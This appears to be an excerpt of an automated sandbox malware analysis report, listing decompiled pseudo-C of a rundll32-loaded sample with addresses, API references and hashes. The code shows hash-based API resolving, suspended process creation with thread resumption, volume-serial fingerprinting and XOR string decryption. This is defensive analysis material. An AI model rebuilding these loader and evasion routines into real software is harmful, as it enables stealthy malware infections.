				signed int _t100;
				void* _t102;
				void* _t103;

				_t95 = __edx;
				_t80 = 0;
				_v24 = __edx;
				_v20 = 0;
				_v8 = 0;
				_t48 = E0494CE25("endless");
				_t96 = _t48;
				_v29 = 0;
				_t98 = 0xf;
				if(_t96 <= _t98) {
					__eflags = _t96;
					if(_t96 == 0) {
						goto L5;
					}
					goto L3;
				} else {
					_t96 = _t98;
					L3:
					_t94 = _t80;
					do {
						_t5 = _t94 + 0x41; // 0x41
						 *((char*)(_t102 + _t94 - 0x28)) = _t5;
						_t94 = _t94 + 1;
					} while (_t94 < _t96);
					L5:
					lstrlenW( &_v44);
					_t97 = E0494A543( &_v20);
					_v28 = _t97;
					if(_t97 != 0) {
						_t99 = _v20;
						_v16 = _t80;
						__eflags = _t99;
						if(_t99 == 0) {
							L27:
							E0494913B( &_v28, _t80);
							return _v8;
						} else {
							goto L11;
						}
						while(1) {
							L11:
							__eflags = _v8 - _t80;
							if(_v8 != _t80) {
								break;
							}
							_t100 = _v8;
							_v12 = 1;
							do {
								__eflags = _t100;
								if(_t100 != 0) {
									break;
								}
								E049492A2( &_v44, _t80, 0x10);
								_t60 =  *0x4960fd8; // 0x49ffc50
								_t103 = _t103 + 0xc;
								__eflags =  *(_t60 + 0x1898) & 0x00000200;
								if(__eflags != 0) {
									E0494E15A(_t80, _t95, __eflags);
								}
								_t95 =  &_v44;
								_t62 = E0494CA94( *((intOrPtr*)(_t97 + _v16 * 4)),  &_v44); // executed
								__eflags = _t62;
								if(_t62 >= 0) {
									_t95 =  &_v44;
									_t71 = E0494A823(0x49413b8,  &_v44, _v24, _v12); // executed
									__eflags = _t71;
									if(__eflags != 0) {
										_t72 = E0494A952( &_v44, __eflags); // executed
										__eflags = _t72;
										if(_t72 != 0) {
											_t100 = 1;
											__eflags = 1;
										}
									}
								}
								__eflags = _v44 - _t80;
								if(_v44 != _t80) {
									__eflags = _t100;
									if(_t100 == 0) {
										_t69 =  *0x4960fa0; // 0x49ff8a0
										 *((intOrPtr*)(_t69 + 0x114))(_v44, _t80);
									}
									_t65 =  *0x4960fa0; // 0x49ff8a0
									 *((intOrPtr*)(_t65 + 0x34))(_v40);
									_t67 =  *0x4960fa0; // 0x49ff8a0
									 *((intOrPtr*)(_t67 + 0x34))(_v44);
								}
								_t64 = _v12 + 1;
								_v12 = _t64;
								__eflags = _t64 - 2;
							} while (_t64 <= 2);
							_t57 = _v16 + 1;
							_v8 = _t100;
							_t99 = _v20;
							_v16 = _t57;
							__eflags = _t57 - _t99;
							if(_t57 < _t99) {
								continue;
							} else {
								break;
							}
							do {
								goto L26;
							} while (_t99 != 0);
							goto L27;
						}
						L26:
						E0494913B(_t97, 0xfffffffe);
						_t97 = _t97 + 4;
						_t99 = _t99 - 1;
						__eflags = _t99;
					}
					_t74 = E0494CE25("appear");
					_v29 = _t80;
					if(_t74 > _t98) {
						do {
							L8:
							_t12 = _t80 + 0x41; // 0x41
							 *((char*)(_t102 + _t80 - 0x28)) = _t12;
							_t80 = _t80 + 1;
						} while (_t80 < _t98);
						L9:
						lstrlenW( &_v44);
						return 0;
					}
					_t98 = _t74;
					if(_t98 == 0) {
						goto L9;
					}
					goto L8;
				}
			}

0x0494a664
0x0494a66d
0x0494a66f
0x0494a677
0x0494a67a
0x0494a67d
0x0494a685
0x0494a687
0x0494a68a
0x0494a68d
0x0494a693
0x0494a695
0x00000000
0x00000000
0x00000000
0x0494a68f
0x0494a68f
0x0494a697
0x0494a697
0x0494a699
0x0494a699
0x0494a69c
0x0494a6a0
0x0494a6a1
0x0494a6a5
0x0494a6a9
0x0494a6b7
0x0494a6b9
0x0494a6be
0x0494a6f5
0x0494a6f8
0x0494a6fb
0x0494a6fd
0x0494a7e7
0x0494a7ec
0x00000000
0x00000000
0x00000000
0x00000000
0x0494a703
0x0494a703
0x0494a703
0x0494a706
0x00000000
0x00000000
0x0494a70c
0x0494a70f
0x0494a716
0x0494a716
0x0494a718
0x00000000
0x00000000
0x0494a725
0x0494a72a
0x0494a72f
0x0494a732
0x0494a73c
0x0494a743
0x0494a743
0x0494a74b
0x0494a751
0x0494a756
0x0494a758
0x0494a75d
0x0494a768
0x0494a76f
0x0494a771
0x0494a776
0x0494a77b
0x0494a77d
0x0494a781
0x0494a781
0x0494a781
0x0494a77d
0x0494a771
0x0494a782
0x0494a785
0x0494a787
0x0494a789
0x0494a78b
0x0494a794
0x0494a794
0x0494a79a
0x0494a7a2
0x0494a7a5
0x0494a7ad
0x0494a7ad
0x0494a7b3
0x0494a7b4
0x0494a7b7
0x0494a7b7
0x0494a7c3
0x0494a7c4
0x0494a7c7
0x0494a7ca
0x0494a7cd
0x0494a7cf
0x00000000
0x00000000
0x00000000
0x00000000
0x0494a7d5
0x00000000
0x00000000
0x00000000
0x0494a7d5
0x0494a7d5
0x0494a7d8
0x0494a7de
0x0494a7e2
0x0494a7e2
0x0494a7e2
0x0494a6c5
0x0494a6ca
0x0494a6d0
0x0494a6d8
0x0494a6d8
0x0494a6d8
0x0494a6db
0x0494a6df
0x0494a6e0
0x0494a6e4
0x0494a6e8
0x00000000
0x0494a6ee
0x0494a6d2
0x0494a6d6
0x00000000
0x00000000
0x00000000
0x0494a6d6

APIs

lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 0494A6A9
lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 0494A6E8

Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4

Strings

endless, xrefs: 0494A672
appear, xrefs: 0494A6C0

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: lstrlen$memset
String ID: appear$endless
API String ID: 3887242890-2536025861
Opcode ID: 5e309462242fb3a50108344237ba0cf5d8f93ddc881244d5d149bbb84632b0f3
Instruction ID: d0c701e214561e466efdc3c0d296341d80fa29cf1aa6f0527675bf4cb851d560
Opcode Fuzzy Hash: 5e309462242fb3a50108344237ba0cf5d8f93ddc881244d5d149bbb84632b0f3
Instruction Fuzzy Hash: C0418172D812199FDF21DFA4C984DEEBBB9EBC8724F240579D801A7240EB31AD458B90

Uniqueness

Uniqueness Score: -1.00%

Function 049492F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E049492F0(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0494E605( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0494CE25( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x049492f9
0x049492fb
0x049492fe
0x04949301
0x04949307
0x04949364
0x00000000
0x04949364
0x04949309
0x04949314
0x04949317
0x0494931c
0x04949321
0x04949324
0x04949326
0x04949329
0x0494932c
0x04949331
0x00000000
0x00000000
0x00000000
0x00000000
0x04949333
0x04949333
0x04949345
0x04949352
0x04949356
0x00000000
0x00000000
0x04949358
0x0494935b
0x0494935c
0x04949362
0x00000000
0x00000000
0x00000000
0x04949362
0x04949379
0x0494937e
0x04949382
0x00000000
0x0494938e
0x0494938e
0x04949390
0x04949390
0x04949396
0x00000000
0x00000000
0x0494939c
0x049493a0
0x049493a4
0x00000000
0x00000000
0x00000000
0x049493a4
0x049493aa
0x049493b2
0x049493b7
0x049493ba
0x049493ba
0x049493bc
0x049493c0
0x049493c8
0x00000000
0x00000000
0x049493cc
0x049493d4
0x00000000
0x00000000
0x00000000
0x049493d4

APIs

LoadLibraryA.KERNELBASE(.dll,?,00000144,00000000), ref: 049493C0
GetProcAddress.KERNEL32(00000000,?), ref: 049493CC

Strings

.dll, xrefs: 049493BC, 049493BF

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: c8ada6f12bad4a5faf0291f9b2b6321d25941dda25ab0d02dba2d756f62ff718
Instruction ID: 11edc47729a64369000cfd581624ce1e148d556817eeb90c224258eaada9f968
Opcode Fuzzy Hash: c8ada6f12bad4a5faf0291f9b2b6321d25941dda25ab0d02dba2d756f62ff718
Instruction Fuzzy Hash: EE3181B1A002559BCB28CF79C884AAFBBF9BF86308F244479D845D72A1D770ED41C790

Uniqueness

Uniqueness Score: -1.00%

Function 0494D04D Relevance: 4.6, APIs: 3, Instructions: 82
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0494D04D(WCHAR* __ecx, WCHAR* __edx, void* __eflags) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				char _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t26;
				signed int _t28;
				void* _t32;
				long _t37;
				WCHAR* _t42;
				WCHAR* _t57;
				void* _t60;

				_v8 = _v8 & 0x00000000;
				_t42 = __edx;
				_t57 = __ecx;
				E049492A2(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x4960fa0; // 0x49ff8a0
				 *((intOrPtr*)(_t23 + 0xc0))( &_v12);
				E0494C145(__edx,  &_v528, 0x100);
				 *((intOrPtr*)(_t60 + 0xc)) = 0x331;
				_t26 = E049490EA(__edx,  &_v528);
				_v16 = _t26;
				_t28 = GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t28;
				E04949D66( &_v16);
				_t32 = E0494CE3E(_t42);
				E0494C08E( &(_t42[E0494CE3E(_t42)]), 0x100 - _t32, L"%u", _v8);
				lstrcatW(_t42, _t57);
				_t37 = E0494CE3E(_t42);
				_v12 = _t37;
				CharUpperBuffW(_t42, _t37);
				return E0494E605(_t42, E0494CE3E(_t42) + _t39, 0);
			}

0x0494d056
0x0494d062
0x0494d068
0x0494d06a
0x0494d072
0x0494d080
0x0494d085
0x0494d094
0x0494d099
0x0494d0a0
0x0494d0ad
0x0494d0c7
0x0494d0cc
0x0494d0ce
0x0494d0d5
0x0494d0e5
0x0494d0f6
0x0494d100
0x0494d108
0x0494d10f
0x0494d112
0x0494d12f

APIs

Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4

GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0494D0C7

Part of subcall function 0494C08E: _vsnwprintf.MSVCRT ref: 0494C0AB

lstrcatW.KERNEL32(?,00000114), ref: 0494D100
CharUpperBuffW.USER32(?,00000000), ref: 0494D112

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatmemset
String ID:
API String ID: 3467380347-0
Opcode ID: e4e2966c34a881eb65f95b3c51ebe38b3367684709f064ee647e7cf0e0187cb4
Instruction ID: 11872eb5f2a85d8e500bad4880801430697b5b8fc45004485de359387e7ffda8
Opcode Fuzzy Hash: e4e2966c34a881eb65f95b3c51ebe38b3367684709f064ee647e7cf0e0187cb4
Instruction Fuzzy Hash: 562130B2A01214BFEB14ABB4DC89FAF77BCEBC5214F104579E506D7180EA746F048B60

Uniqueness

Uniqueness Score: -1.00%

Function 0494DBAF Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0494DBAF(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E0494911F(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0494913B( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x0494dbb2
0x0494dbb3
0x0494dbba
0x0494dbc2
0x0494dbc6
0x0494dbcf
0x0494dc15
0x0494dc15
0x0494dbdc
0x0494dbe4
0x0494dbe6
0x0494dbec
0x0494dc05
0x00000000
0x0494dc07
0x0494dc0c
0x00000000
0x0494dc12
0x0494dbee
0x0494dbee
0x0494dbee
0x0494dbee
0x0494dbec
0x0494dc1b

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04940000,00000000,00000000,?,0494DC30,00000000,00000000,?,0494DC59), ref: 0494DBCA
GetLastError.KERNEL32(?,0494DC30,00000000,00000000,?,0494DC59,00001644,?,0494BBDE), ref: 0494DBD1
GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0494DC30,00000000,00000000,?,0494DC59,00001644,?,0494BBDE), ref: 0494DC00

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: 4a8a5b2a30cda89ccbd84c766ff5930690e6f140742f9ce37f8c57c62486f397
Instruction ID: 09add43b99b1ba83473fd42bcd9039a2cfc1be4814a5a5c109f31da8cb3aa667
Opcode Fuzzy Hash: 4a8a5b2a30cda89ccbd84c766ff5930690e6f140742f9ce37f8c57c62486f397
Instruction Fuzzy Hash: EA01AD7A710224BF9B209AA5DC8DDAF7FBCDF896A5B100639F506D2100E670ED408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0494A952 Relevance: 4.5, APIs: 3, Instructions: 44
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0494A952(void* __ecx, void* __eflags) {
				char _v44;
				intOrPtr _t9;
				intOrPtr _t12;
				void* _t13;
				intOrPtr _t17;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t32;

				_t9 =  *0x4960fd8; // 0x49ffc50
				_t1 = _t9 + 0xac; // 0x86090ac1
				_t21 = __ecx;
				E0494BFAB( &_v44,  *_t1 + 7, __eflags);
				_t32 = 0;
				_t12 =  *0x4960fa0; // 0x49ff8a0
				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
				_t29 = _t13;
				if(_t29 != 0) {
					GetLastError();
					ResumeThread( *(_t21 + 4));
					_t17 =  *0x4960fa0; // 0x49ff8a0
					_push(0x2710);
					_push(_t29);
					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
						_t32 = 1;
					}
					FindCloseChangeNotification(_t29);
					_t13 = _t32;
				}
				return _t13;
			}

0x0494a955
0x0494a95d
0x0494a965
0x0494a96e
0x0494a976
0x0494a979
0x0494a981
0x0494a987
0x0494a98b
0x0494a98d
0x0494a99b
0x0494a9a1
0x0494a9a6
0x0494a9ab
0x0494a9b1
0x0494a9b5
0x0494a9b5
0x0494a9bd
0x0494a9c0
0x0494a9c0
0x0494a9c6

APIs

GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04944C08), ref: 0494A98D
ResumeThread.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,04944C08), ref: 0494A99B
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,04944C08), ref: 0494A9BD

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotificationResumeThread
String ID:
API String ID: 4135917582-0
Opcode ID: 8b9a05d68a54463873320d4f456b13badf286e608570b39da9bb24b14cddb491
Instruction ID: cf016c147365a7ecb8fd784fec64bd053f3b62e099eec669f1786f892c92bf48
Opcode Fuzzy Hash: 8b9a05d68a54463873320d4f456b13badf286e608570b39da9bb24b14cddb491
Instruction Fuzzy Hash: A1014B32245110EFC701EBA8E888EAA7FBCFB89651B45407DFA05E7245DA64EC01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04949C9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04949C9B(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				char _v88;
				int _t19;
				struct _numberfmt* _t29;
				signed int _t33;
				signed int _t34;
				struct _numberfmt* _t36;
				void* _t38;
				void* _t41;
				struct _numberfmt* _t44;
				signed int _t45;

				_t41 = __edx;
				_t45 = _a12;
				_t44 = 0;
				_v8 = __ecx;
				_t33 = 0;
				if(_t45 >= __edx) {
					L5:
					_t19 = GetNumberFormatA(0x7d3, 0xb4, "electricmadness", _t44,  &_v88, 0x22); // executed
					if(_t19 != 0) {
						_t36 = _t44;
						do {
							_t36 = _t36 + 1;
						} while (_t36 < 0x22);
						L11:
						_t38 = E0494911F(2 + _t33 * 2);
						if(_t38 != 0) {
							if(_t33 == 0) {
								L15:
								return _t38;
							} else {
								goto L14;
							}
							do {
								L14:
								 *((short*)(_t38 + _t44 * 2)) = ( *((_t45 & 0x0000007f) + _a4) ^  *(_t45 + _v8)) & 0x000000ff;
								_t44 = _t44 + 1;
								_t45 = _t45 + 1;
							} while (_t44 < _t33);
							goto L15;
						}
						return 0x49610a8;
					}
					_t29 = _t44;
					do {
						_t29 = _t29 + 1;
					} while (_t29 < 0x14);
					goto L11;
				}
				while( *((_t45 & 0x0000007f) + _a4) !=  *(_t45 + _v8)) {
					_t45 = _t45 + 1;
					if(_t45 < _t41) {
						continue;
					}
					_t45 = _a12;
					goto L5;
				}
				_t34 = _t45;
				_t45 = _a12;
				_t33 = _t34 - _t45;
				goto L5;
			}

0x04949c9b
0x04949ca3
0x04949ca7
0x04949ca9
0x04949cac
0x04949cb0
0x04949cd6
0x04949cec
0x04949cf4
0x04949d00
0x04949d02
0x04949d02
0x04949d03
0x04949d08
0x04949d16
0x04949d1a
0x04949d25
0x04949d45
0x00000000
0x00000000
0x00000000
0x00000000
0x04949d27
0x04949d27
0x04949d3b
0x04949d3f
0x04949d40
0x04949d41
0x00000000
0x04949d27
0x00000000
0x04949d1c
0x04949cf6
0x04949cf8
0x04949cf8
0x04949cf9
0x00000000
0x04949cfe
0x04949cb2
0x04949cc5
0x04949cc8
0x00000000
0x00000000
0x04949cca
0x00000000
0x04949cca
0x04949ccf
0x04949cd1
0x04949cd4
0x00000000

APIs

GetNumberFormatA.KERNEL32 ref: 04949CEC

Strings

electricmadness, xrefs: 04949CDD

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: FormatNumber
String ID: electricmadness
API String ID: 481257995-1127315026
Opcode ID: 4bc7ef5b81dc9ce0afa054e83a096e18ef5a2852f03e8418282c73be52ba1a4f
Instruction ID: 38c2c3b311a8351d1ced60cc7d400e41e6d2abef44f9c4918e6b7cc8a4b0b3de
Opcode Fuzzy Hash: 4bc7ef5b81dc9ce0afa054e83a096e18ef5a2852f03e8418282c73be52ba1a4f
Instruction Fuzzy Hash: 721106B27043556FDB149F78D841EBB37AAABC9619B140479F996EB251D670FC02C380

Uniqueness

Uniqueness Score: -1.00%

Function 04949BF7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04949BF7(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				char _v88;
				signed int _t21;
				struct _numberfmt* _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				signed int _t30;
				signed int _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				signed int _t37;
				signed int _t38;
				void* _t39;

				_t34 = __edx;
				_t29 = __ecx;
				_t37 = _a12;
				_t38 = _t37;
				_v8 = __ecx;
				if(_t37 >= __edx) {
					L4:
					_t27 = 0;
					if(GetNumberFormatA(0xdc, 0x172, "chickenfried", 0,  &_v88, 0x22) != 0) {
						do {
							_t27 = _t27 + 1;
						} while (_t27 < 0x22);
						L14:
						_t30 = 0x496107e;
						L15:
						return _t30;
					} else {
						goto L5;
					}
					do {
						L5:
						_t27 = _t27 + 1;
					} while (_t27 < 0x14);
					goto L14;
				}
				_t28 = _a4;
				while( *((intOrPtr*)((_t38 & 0x0000007f) + _t28)) !=  *((intOrPtr*)(_t38 + _t29))) {
					_t38 = _t38 + 1;
					if(_t38 < _t34) {
						continue;
					}
					goto L4;
				}
				_t39 = _t38 - _t37;
				if(_t39 == 0) {
					goto L4;
				}
				_t21 = E0494911F(_t39 + 1); // executed
				_t32 = _t21;
				_a12 = _t32;
				if(_t32 != 0) {
					_t33 = _v8;
					_t36 = _t32 - _t37;
					do {
						 *(_t36 + _t37) =  *((_t37 & 0x0000007f) + _t28) ^  *(_t37 + _t33);
						_t37 = _t37 + 1;
						_t39 = _t39 - 1;
					} while (_t39 != 0);
					_t30 = _a12;
					goto L15;
				}
				return 0x496107e;
			}

0x04949bf7
0x04949bf7
0x04949c00
0x04949c03
0x04949c05
0x04949c0a
0x04949c21
0x04949c26
0x04949c41
0x04949c89
0x04949c89
0x04949c8a
0x04949c8f
0x04949c8f
0x04949c94
0x00000000
0x00000000
0x00000000
0x00000000
0x04949c43
0x04949c43
0x04949c43
0x04949c44
0x00000000
0x04949c49
0x04949c0c
0x04949c0f
0x04949c1c
0x04949c1f
0x00000000
0x00000000
0x00000000
0x04949c1f
0x04949c4b
0x04949c4d
0x00000000
0x00000000
0x04949c53
0x04949c59
0x04949c5b
0x04949c60
0x04949c6b
0x04949c6e
0x04949c70
0x04949c7b
0x04949c7e
0x04949c7f
0x04949c7f
0x04949c84
0x00000000
0x04949c84
0x00000000

APIs

GetNumberFormatA.KERNEL32 ref: 04949C39

Strings

chickenfried, xrefs: 04949C2A

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: FormatNumber
String ID: chickenfried
API String ID: 481257995-586419266
Opcode ID: d66118e26c5f6de98aaded285a8352c4ab70fd5a8c49929f7ff1db4fd34bd749
Instruction ID: c2efe5d5a7bcfe3f8263f1106c2d24f98fb69bedf7beb726fd3b43258a51e6ef
Opcode Fuzzy Hash: d66118e26c5f6de98aaded285a8352c4ab70fd5a8c49929f7ff1db4fd34bd749
Instruction Fuzzy Hash: D5112BF1B043566FD7148FBCC881DAB7BEE9BC5206B104579E59A9B251E520FC018350

Uniqueness

Uniqueness Score: -1.00%

Function 0494CA94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0494CA94(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E049492A2(__edx, 0, 0x10);
				E049492A2( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x0494caa5
0x0494cab2
0x0494caba
0x0494cad6
0x0494cadc
0x0494cae3

APIs

Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4

